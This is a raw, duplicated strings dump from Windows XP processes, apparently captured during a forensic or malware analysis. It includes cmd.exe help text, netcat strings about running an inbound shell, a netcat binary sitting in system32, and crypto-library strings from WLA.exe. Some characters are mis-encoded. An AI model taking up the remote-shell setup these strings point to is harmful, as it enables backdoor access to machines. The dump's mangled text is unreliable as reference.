under Windows XP.
Starts a new instance of the Windows XP command interpreter
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
variable var at execution time. The %var% syntax expands variables
of an executable file.
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
The restartable option to the COPY command is not supported by
this version of the operating system.
this version of the operating system.
The following usage of the path operator in batch-parameter
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
! ~ - - unary operators
* / %% - arithmetic operators
* / %% - arithmetic operators
- - arithmetic operators
- - arithmetic operators
&= ^= |= <<= >>=
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
%%4 %%5 ...)
CMD /? for details.
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
command execution.
non-executable files may be invoked through their file association just
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
different parsing options. The keywords are:
be passed to the for body for each iteration.
be passed to the for body for each iteration.
where a back quoted string is executed as a
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
to create temporary drive letter to support UNC current
Missing operand.
Missing operand.
Missing operator.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
application execution.
The switch /Y may be present in the COPYCMD environment variable.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute
nc.exe_1524:
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.BENu
.BENu
user32.dll
user32.dll
WaitForMultipleObjects error: %s
WaitForMultipleObjects error: %s
Failed to create ReadShell session thread, error = %s
Failed to create ReadShell session thread, error = %s
Failed to execute shell
Failed to execute shell
Failed to create shell stdin pipe, error = %s
Failed to create shell stdin pipe, error = %s
Failed to create shell stdout pipe, error = %s
Failed to create shell stdout pipe, error = %s
Failed to execute shell, error = %s
Failed to execute shell, error = %s
SessionReadShellThreadFn exitted, error = %s
SessionReadShellThreadFn exitted, error = %s
%s: option `%s' requires an argument
%s: option `%s' requires an argument
%s: option `%c%s' doesn't allow an argument
%s: option `%c%s' doesn't allow an argument
%s: option `--%s' doesn't allow an argument
%s: option `--%s' doesn't allow an argument
%s: invalid option -- %c
%s: invalid option -- %c
%s: illegal option -- %c
%s: illegal option -- %c
%s: option requires an argument -- %c
%s: option requires an argument -- %c
%s: unrecognized option `%c%s'
%s: unrecognized option `%c%s'
%s: unrecognized option `--%s'
%s: unrecognized option `--%s'
%s: option `%s' is ambiguous
%s: option `%s' is ambiguous
sent %d, rcvd %d
sent %d, rcvd %d
VERNOTSUPPORTED
VERNOTSUPPORTED
AFNOSUPPORT
AFNOSUPPORT
PFNOSUPPORT
PFNOSUPPORT
SOCKTNOSUPPORT
SOCKTNOSUPPORT
PROTONOSUPPORT
PROTONOSUPPORT
MSGSIZE
MSGSIZE
Hmalloc %d failed
Hmalloc %d failed
DNS fwd/rev mismatch: %s != %s
DNS fwd/rev mismatch: %s != %s
Warning: forward host lookup failed for %s: h_errno %d
Warning: forward host lookup failed for %s: h_errno %d
%s: inverse host lookup failed: h_errno %d
%s: inverse host lookup failed: h_errno %d
Warning: inverse host lookup failed for %s: h_errno %d
Warning: inverse host lookup failed for %s: h_errno %d
%s: forward host lookup failed: h_errno %d
%s: forward host lookup failed: h_errno %d
Can't parse %s as an IP address
Can't parse %s as an IP address
Warning: port-bynum mismatch, %d != %d
Warning: port-bynum mismatch, %d != %d
loadports: bogus values %d, %d
loadports: bogus values %d, %d
loadports: no block?!
loadports: no block?!
Can't grab %s:%d with bind
Can't grab %s:%d with bind
retrying local %s:%d
retrying local %s:%d
connect to [%s] from %s [%s] %d
connect to [%s] from %s [%s] %d
invalid connection to [%s] from %s [%s] %d
invalid connection to [%s] from %s [%s] %d
] %d ...
] %d ...
UDP listen needs -p arg
UDP listen needs -p arg
udptest first write failed?! errno %d
udptest first write failed?! errno %d
Preposterous Pointers: %d, %d
Preposterous Pointers: %d, %d
sent %d, rcvd %d
sent %d, rcvd %d
%s [%s] %d (%s)
%s [%s] %d (%s)
%s [%s] %d (%s) open
%s [%s] %d (%s) open
no port[s] to connect to
no port[s] to connect to
invalid port %s
invalid port %s
can't open %s
can't open %s
invalid wait-time %s
invalid wait-time %s
invalid local port %s
invalid local port %s
invalid interval time %s
invalid interval time %s
invalid hop pointer %d, must be multiple of 4 <= 28
invalid hop pointer %d, must be multiple of 4 <= 28
Cmd line:
Cmd line:
port numbers can be individual or ranges: m-n [inclusive]
port numbers can be individual or ranges: m-n [inclusive]
UDP mode
UDP mode
delay interval for lines sent, ports scanned
delay interval for lines sent, ports scanned
-p port
-p port
local port number
local port number
randomize local and remote ports
randomize local and remote ports
inbound program to exec [dangerous!!]
inbound program to exec [dangerous!!]
nc [-options] hostname port[s] [ports] ...
nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
nc -l -p port [options] [hostname] [port]
c:\windows\system32\nc.exe
c:\windows\system32\nc.exe
DisconnectNamedPipe
DisconnectNamedPipe
CreatePipe
CreatePipe
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
WSOCK32.dll
WSOCK32.dll
GetCPInfo
GetCPInfo
rundll32.exe_1112:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
IMAGEHLP.dll
IMAGEHLP.dll
rundll32.pdb
rundll32.pdb
.....eZXnnnnnnnnnnnn3
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
O3$dS7"%U9
.manifest
.manifest
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
RUNDLL.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
YThere is not enough memory to run the file %s.
YThere is not enough memory to run the file %s.
Please close other windows and try again.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Error in %s
Missing entry:%s
Missing entry:%s
Error loading %s
Error loading %s
WLA.exe_220:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
udPh
udPh
PSSSSSSh
PSSSSSSh
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
.EKSWU
.EKSWU
FTPG
FTPG
FTPj
FTPj
FtPS
FtPS
=KNILw.tT=RCNEw
=KNILw.tT=RCNEw
_0 _8 _4;_,
_0 _8 _4;_,
SHA1 block transform for x86, CRYPTOGAMS by <appro></appro>
SHA1 block transform for x86, CRYPTOGAMS by <appro></appro>
SHA256 block transform for x86, CRYPTOGAMS by <appro></appro>
SHA256 block transform for x86, CRYPTOGAMS by <appro></appro>
DlSHA512 block transform for x86, CRYPTOGAMS by <appro></appro>
DlSHA512 block transform for x86, CRYPTOGAMS by <appro></appro>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro></appro>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro></appro>
6-9'6-9'
6-9'6-9'
$6.:$6.:
$6.:$6.:
*?#1*?#1
*?#1*?#1
>8$4,8$4,
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro></appro>
AES for x86, CRYPTOGAMS by <appro></appro>
Camellia for x86 by <appro></appro>
Camellia for x86 by <appro></appro>
RC4 for x86, CRYPTOGAMS by <appro></appro>
RC4 for x86, CRYPTOGAMS by <appro></appro>
FRegDeleteKeyExW
FRegDeleteKeyExW
MARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}